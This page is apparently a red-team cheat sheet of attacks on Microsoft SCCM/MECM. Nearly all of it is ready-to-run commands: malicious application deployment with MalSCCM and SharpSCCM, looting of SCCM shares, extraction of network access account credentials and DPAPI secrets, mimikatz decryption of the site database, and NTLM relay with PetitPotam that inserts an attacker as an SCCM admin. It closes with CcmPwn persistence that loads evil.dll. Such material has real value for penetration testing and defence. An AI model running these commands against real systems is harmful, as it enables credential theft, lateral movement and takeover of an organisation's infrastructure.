Skip to content

Deployment - SCCM

SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.

SCCM Application Deployment

Application Deployment is a process that involves packaging software applications and distributing them to selected computers or devices within an organization

Tools:

Exploitation:

  • Using SharpSCCM 
    .\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
  • Compromise client, use locate to find management server 
    MalSCCM.exe locate
  • Enumerate over WMI as an administrator of the Distribution Point 
    MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
  • Compromise management server, use locate to find primary server
  • Use inspect on primary server to view who you can target 
    MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers
MalSCCM.exe inspect /primaryusers
MalSCCM.exe inspect /groups

  • Create a new device group for the machines you want to laterally move too 

    MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe inspect /groups

  • Add your targets into the new group 

    MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL

  • Create an application pointing to a malicious EXE on a world readable share : SCCMContentLib$ 

    MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
MalSCCM.exe inspect /applications

  • Deploy the application to the target group 

    MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
MalSCCM.exe inspect /deployments

  • Force the target group to checkin for updates 

    MalSCCM.exe checkin /groupname:TargetGroup

  • Cleanup the application, deployment and group 

    MalSCCM.exe app /cleanup /name:demoapp
MalSCCM.exe group /delete /groupname:TargetGroup

SCCM Shares

Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares

  • 1njected/CMLoot 
    Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi

SCCM Configuration Manager

CRED-1 Retrieve credentials via PXE boot media

Requirements:

  • On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\PxeInstalled = 1
  • On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\IsPxe = 1
  • PXE-enabled distribution point

Exploitation:

CRED-2 Request a policy containing credentials

Requirements:

  • PKI certificates are not required for client authentication
  • Domain accounts credential

Exploitation:

Create a machine or compromise an existing one, then request policies such as NAAConfig

Easy mode using SharpSCCM

```ps1
SharpSCCM get secrets -u <username-machine-$> -p <password>
SharpSCCM get naa
```

Stealthy mode by creating a computer.

  • Create a machine account with a specific password: addcomputer.py -computer-name 'customsccm$' -computer-pass 'YourStrongPassword123*' 'sccm.lab/carol:SCCMftw' -dc-ip 192.168.33.10
  • In your /etc/hosts file, add an entry for the MECM server: 192.168.33.11 MECM MECM.SCCM.LAB
  • Use sccmwtf to request a policy: python3 sccmwtf.py fake fakepc.sccm.lab MECM 'SCCMLAB\customsccm$' 'YourStrongPassword123*'
  • Parse the policy to extract the credentials and decrypt them using sccmwtf/policysecretunobfuscate.py: cat /tmp/naapolicy.xml |grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 |grep -e 'CDATA' | cut -d '[' -f 3|cut -d ']' -f 1| xargs -I {} python3 policysecretunobfuscate.py {}

CRED-3 Extract currently deployed credentials stored as DPAPI blobs

Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.

Requirements:

  • Local administrator privileges on an SCCM client

Exploitation:

  • Find SCCM blob 

    Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>

  • Using GhostPack/SharpDPAPI 

    $str = "060...F2DAF"
$bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt

  • Using Mayyhem/SharpSCCM for SCCM retrieval and decryption 

    .\SharpSCCM.exe local secrets -m wmi

From a remote machine.

  • Using garrettfoster13/sccmhunter 
    python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto

CRED-4 Extract legacy credentials stored as DPAPI blobs

Requirements:

  • Local administrator privileges on an SCCM client

Exploitation:

  • Search the database using SharpDPAPI 

    .\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA

  • Search the database using SharpSCCM 

    .\SharpSCCM.exe local secrets -m disk

  • Check ACL for the CIM repository located at C:\Windows\System32\wbem\Repository\OBJECTS.DATA: 

    Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
ConvertFrom-SddlString ""

CRED-5 Extract the SC_UserAccount table from the site database

Requirements:

  • Site database access
  • Primary site server access
    • Access to the private key used for encryption

Exploitation:

  • gentilkiwi/mimikatz 
    mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
  • skahwah/SQLRecon, only if the site server and database are hosted on the same system 
    SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
  • SQLRecon + xpn/sccmdecryptpoc.cs 
    SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
sccmdecryptpoc.exe 0C010000080[...]5D6F0

SCCM Relay

TAKEOVER1 - Low Privileges to Database Administrator - MSSQL relay

Requirements:

  • Database separated from the site server
  • Server site is sysadmin of the database

Exploitation:

  • Generate the query to elevate our user: python3 sccmhunter.py mssql -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.33.10 -debug -tu carol -sc P01 -stacked
  • Setup a relay with the generated query: ntlmrelayx.py -smb2support -ts -t mssql://192.168.33.12 -q "USE CM_P01; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x01050000000000051500000058ED3FD3BF25B04EDE28E7B85A040000,'SCCMLAB\carol',0,0,'','','','','P01');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00004','1');"
  • Coerce an authentication to your listener using a domain account: petitpotam.py -d sccm.lab -u carol -p SCCMftw 192.168.33.1 192.168.33.11
  • Finally, connect as admin on the MSSQL server: python3 sccmhunter.py admin -u carol@sccm.lab -p 'SCCMftw' -ip 192.168.33.11

TAKEOVER2 - Low Privileges to MECM Admin Account - SMB relay

Microsoft requires the site server's computer account to be an administrator on the MSSQL server.

Exploitation:

  • Start a listener for the MSSQL Server: ntlmrelayx -t 192.168.33.12 -smb2support -socks
  • Coerce an authentication from the Site Server using domain credentials (low privileges SCCM NAA retrieved on the same machine works great): petitpotam.py -d sccm.lab -u sccm-naa -p 123456789 192.168.33.1 192.168.33.11
  • Finally use the SOCKS from ntlmrelayx to access the MSSQL server as a local administrator 
    proxychains -q smbexec.py -no-pass SCCMLAB/'MECM$'@192.168.33.12 
proxychains -q secretsdump.py -no-pass SCCMLAB/'MECM$'@192.168.33.12

SCCM Persistence

  • mandiant/CcmPwn - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.

CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.

  • Backdoor the SCNotification.exe.config to load your DLL

    python3 ccmpwn.py domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config

  • Malicious config to force SCNotification.exe to load a file from an attacker-controlled file share

    python3 ccmpwn.py domain/user:password@workstation.domain.local coerce -computer 10.10.10.10

References